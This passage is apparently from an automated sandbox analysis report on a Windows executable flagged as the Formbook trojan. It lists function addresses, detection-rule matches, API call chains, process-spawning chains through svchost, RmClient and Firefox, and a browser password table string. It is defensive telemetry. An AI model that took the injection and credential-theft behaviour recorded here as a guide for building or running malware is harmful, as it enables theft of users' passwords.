            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029E7AFC3_2_029E7AFC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_02A068AC3_2_02A068AC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029EE45C3_2_029EE45C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029EE4573_2_029EE457
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029E5D9C3_2_029E5D9C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029E7D1C3_2_029E7D1C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EB02C05_2_02EB02C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED02745_2_02ED0274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EF03E65_2_02EF03E6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3E3F05_2_02E3E3F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEA3525_2_02EEA352
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EC20005_2_02EC2000
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE81CC5_2_02EE81CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EF01AA5_2_02EF01AA
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE41A25_2_02EE41A2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EB81585_2_02EB8158
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E201005_2_02E20100
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECA1185_2_02ECA118
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4C6E05_2_02E4C6E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E2C7C05_2_02E2C7C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E307705_2_02E30770
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E547505_2_02E54750
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EDE4F65_2_02EDE4F6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE24465_2_02EE2446
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED44205_2_02ED4420
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EF05915_2_02EF0591
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E305355_2_02E30535
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E2EA805_2_02E2EA80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE6BD75_2_02EE6BD7
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEAB405_2_02EEAB40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E5E8F05_2_02E5E8F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E168B85_2_02E168B8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3A8405_2_02E3A840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E328405_2_02E32840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E329A05_2_02E329A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EFA9A65_2_02EFA9A6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E469625_2_02E46962
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEEEDB5_2_02EEEEDB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E42E905_2_02E42E90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EECE935_2_02EECE93
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E30E595_2_02E30E59
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEEE265_2_02EEEE26
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3CFE05_2_02E3CFE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E22FC85_2_02E22FC8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EAEFA05_2_02EAEFA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA4F405_2_02EA4F40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E72F285_2_02E72F28
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E50F305_2_02E50F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED2F305_2_02ED2F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E20CF25_2_02E20CF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED0CB55_2_02ED0CB5
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E30C005_2_02E30C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E2ADE05_2_02E2ADE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E48DBF5_2_02E48DBF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3AD005_2_02E3AD00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECCD1F5_2_02ECCD1F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED12ED5_2_02ED12ED
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4B2C05_2_02E4B2C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E352A05_2_02E352A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E7739A5_2_02E7739A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E1D34C5_2_02E1D34C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE132D5_2_02EE132D
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE70E95_2_02EE70E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF0E05_2_02EEF0E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EDF0CC5_2_02EDF0CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E370C05_2_02E370C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3B1B05_2_02E3B1B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EFB16B5_2_02EFB16B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E6516C5_2_02E6516C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E1F1725_2_02E1F172
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE16CC5_2_02EE16CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E756305_2_02E75630
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF7B05_2_02EEF7B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E214605_2_02E21460
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF43F5_2_02EEF43F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EF95C35_2_02EF95C3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECD5B05_2_02ECD5B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE75715_2_02EE7571
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EDDAC65_2_02EDDAC6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECDAAC5_2_02ECDAAC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E75AA05_2_02E75AA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED1AA35_2_02ED1AA3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA3A6C5_2_02EA3A6C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFA495_2_02EEFA49
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE7A465_2_02EE7A46
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA5BF05_2_02EA5BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E6DBF95_2_02E6DBF9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4FB805_2_02E4FB80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFB765_2_02EEFB76
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E338E05_2_02E338E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E9D8005_2_02E9D800
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E399505_2_02E39950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4B9505_2_02E4B950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EC59105_2_02EC5910
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E39EB05_2_02E39EB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFFB15_2_02EEFFB1
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E31F925_2_02E31F92
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFF095_2_02EEFF09
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFCF25_2_02EEFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA9C325_2_02EA9C32
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4FDC05_2_02E4FDC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE7D735_2_02EE7D73
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E33D405_2_02E33D40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE1D5A5_2_02EE1D5A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006919905_2_00691990
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068C8C05_2_0068C8C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068CAE05_2_0068CAE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068AB605_2_0068AB60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006950405_2_00695040
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006932205_2_00693220
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0069321B5_2_0069321B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006AB6705_2_006AB670
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE2575_2_02CEE257
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE3735_2_02CEE373
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CED7785_2_02CED778
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE70C5_2_02CEE70C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE7185_2_02CEE718
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE4DB5_2_02CEE4DB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CF54515_2_02CF5451
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CECA335_2_02CECA33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02E77E54 appears 111 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02EAF290 appears 105 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02E65130 appears 58 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02E1B970 appears 280 times
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: String function: 02E9EA12 appears 86 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: String function: 00445AE0 appears 55 times
            Source: enkJ6J7dAn.exe, 00000000.00000003.2140430088.0000000003D33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
            Source: enkJ6J7dAn.exe, 00000000.00000003.2142179487.000000000494D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
            Source: enkJ6J7dAn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeFile created: C:\Users\user\AppData\Local\Temp\cacostomiaJump to behavior
            Source: enkJ6J7dAn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2556441787.00000000009F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: enkJ6J7dAn.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeFile read: C:\Users\user\Desktop\enkJ6J7dAn.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\enkJ6J7dAn.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wininet.dllJump to behavior
